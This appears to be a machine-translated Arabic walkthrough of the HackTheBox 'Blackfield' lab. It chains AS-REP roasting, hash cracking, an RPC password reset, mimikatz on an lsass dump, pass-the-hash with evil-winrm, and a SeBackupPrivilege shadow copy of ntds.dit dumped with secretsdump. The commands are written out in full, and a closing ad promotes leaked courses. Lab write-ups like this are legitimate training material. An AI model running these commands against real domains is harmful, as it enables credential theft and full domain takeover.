
أستمر في نشر الحلول المرسلة لإنهاء الآلات من موقع HackTheBox .
في هذه المقالة ، سأستخدم ASRep Roasting لتعريف المستخدمين ، و RPC لتغيير كلمات المرور والاستيلاء على حساب ، ثم رفع امتيازاتنا باستخدام نسخة الظل NTDS.DIT.
الاتصال بالمختبر عبر VPN. يوصى بعدم الاتصال من كمبيوتر العمل أو من مضيف توجد به بيانات مهمة بالنسبة لك ، حيث تجد نفسك في شبكة خاصة مع أشخاص يعرفون شيئًا عن أمن المعلومات.
المعلومات التنظيمية
ريكون
هذا الجهاز لديه عنوان IP هو 10.10.10.192 ، والذي أقوم بإضافته إلى / etc / hosts.
10.10.10.192 blackfield.htb
الخطوة الأولى هي فحص المنافذ المفتوحة. أفعل ذلك باستخدام النص التالي ، والذي يأخذ وسيطة واحدة - عنوان المضيف الذي يتم فحصه:
#!/bin/bash
ports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -A $1
نرى الكثير من المنافذ المفتوحة ، لكن كالعادة ، لنبدأ مع SMB. دعونا نرى ما إذا كان بإمكاننا فعل شيء ما دون تسجيل الدخول.
smbmap -u anonymous -H 10.10.10.192
وملفات تعريف الدليل $ متاحة للقراءة.
smbmap -u anonymous -H 10.10.10.192 -r 'profiles$'2
لدينا قائمة كبيرة من المستخدمين المحتملين. يمكننا التحقق من المستخدمين الموجودين بالفعل في النظام. الحقيقة هي أنه أثناء هجوم ASRep Roasting ، يكون للخادم ثلاثة استجابات مختلفة:
- تجزئة كلمة مرور المستخدم ؛
- هذا المستخدم ليس لديه مجموعة UAF Dont Require PreAuth ؛
- لا يوجد مثل هذا المستخدم في قاعدة بيانات Kerberos.
وبالتالي ، سنكون قادرين على معرفة من هو ومن ليس كذلك.
نقطة الدخول
أولاً ، دعنا نحصل على قائمة.
smbmap -u anonymous -H 10.10.10.192 -r 'profiles$' | grep 2020 | awk -F ' ' '{print $8}' > users.txt
الآن دعونا نفعل ASRep-Roasting.
GetNPUsers.py blackfield.local/ -dc-ip 10.10.10.192 -k -no-pass -usersfile ./users.txt
وفوجئت عندما أعيد الحشيش إلينا. دعونا نخرمه.
john support.hash -w=./tools/rockyou.txt
ولدينا حساب متحكم فيه بالكامل. الآن دعنا نحصل على أكبر قدر ممكن من المعلومات باستخدام enum4linux.
enum4linux -u support -p '#00^BlackKnight' -a 10.10.10.192 2>/dev/null
سنحصل على قائمة ضخمة من المستخدمين المجهولين ، ولكن الشيء الأكثر إثارة للاهتمام هو عضوية المجموعة. سيخبرنا هذا أن svc_backup موجود في مجموعة RMU (RID: 580) ، والتي تسمح بالاتصالات عن بُعد باستخدام Win-RM.
لا يمكننا أخذ أي شيء آخر من SMB ، لكننا لا نجد أي شيء في LDAP. ولكن في RPC ، كما اتضح ، هناك خدعة واحدة. دعنا نتواصل:
rpcclient 10.10.10.192 -U support
الحقيقة هي أنه من الممكن تغيير كلمة مرور مستخدم بنفس الامتيازات ، كل شيء موصوف بالتفصيل هنا . وتمكنت من القيام بذلك من أجل تدقيق المستخدم 2020.
setuserinfo2 audit2020 18 'ralf'
نبدأ الآن في تحليل جميع الموارد والخدمات من البداية ، حيث لدينا حساب آخر متحكم فيه.
المستعمل
نذهب إلى SMB.
smbmap -u audit2020 -p ralf -d blackfield.local -H 10.10.10.192
هناك الكثير لقراءته ، فمن الأفضل عرض كل المحتوى بشكل متكرر ومشاهدته دفعة واحدة.
smbmap -u audit2020 -p ralf -d blackfield.local -H 10.10.10.192 -R
وفي مجلد \ memory_analysis الطب الشرعي نجد ، على ما يبدو ، تفريغ لعملية lsass. ومنه يمكننا الحصول على كلمات مرور باستخدام mimikatz. قم بتنزيل هذا الملف.
smbclient.py blackfield.local/audit2020:ralf@10.10.10.192
الآن دعنا نذهب إلى جهاز Windows ونستخدم mimikatz.
ومعرفة التجزئة ، باستخدام Evil-WinRM ، نتواصل نيابة عن svc_backup.
evil-winrm -i 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
جذر
دعونا نرى المجموعات وامتيازات المستخدم.
لدينا امتياز SeBackupPrivilege. يمنحنا هذا الحق في إنشاء نسخة احتياطية من ملف NTDS الذي يحتوي على الكثير من بيانات الاعتماد. بعد أن نقوم بإنشاء نسخة ، لا يمكننا ببساطة استخراج الملف المطلوب. لهذا نحن بحاجة إلى ملفات DLL التالية .
لنقم بعمل نسخة احتياطية. لنقم بإنشاء ملف بالمحتوى التالي.
SET CONTEXT PERSISTENT NOWRITERS
add volume c: alias ralfcopy
create
expose %ralfcopy% z:
والآن دعنا نحمله وننزل المكتبات إلى المضيف.
لنقم بإجراء نسخة الظل.
diskshadow /s ds.txt
وتفريغ الملف.
Copy-FileSebackupPrivilege z:\Windows\NTDS\ntds.dit C:\Temp\ntds.dit
لكن هذا الملف مشفر ، ومن أجل فك تشفيره نحتاج إلى ملف SYSTEM ، والذي لن يكون مشكلة في الحصول عليه.
reg save HKLM\SYSTEM C:\Temp\SYSTEM
قم بتنزيل كلا الملفين من الجهاز.
ونحصل على التجزئة باستخدام secretsdump من حزمة impacket.
secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL
دعنا نتواصل كمسؤول.
evil-winrm -i 10.10.10.192 -u Administrator -H 184fb5e5178480be64824d4cd53b99ee
لدينا سيطرة كاملة على هذا الجهاز.
يمكنك الانضمام إلينا على Telegram . هناك يمكنك العثور على مواد مثيرة للاهتمام ودورات مسربة وبرامج. دعنا نجمع مجتمعًا ، حيث سيكون هناك أشخاص على دراية بالعديد من مجالات تكنولوجيا المعلومات ، ثم يمكننا دائمًا مساعدة بعضنا البعض في أي مشكلات تتعلق بتكنولوجيا المعلومات وأمن المعلومات.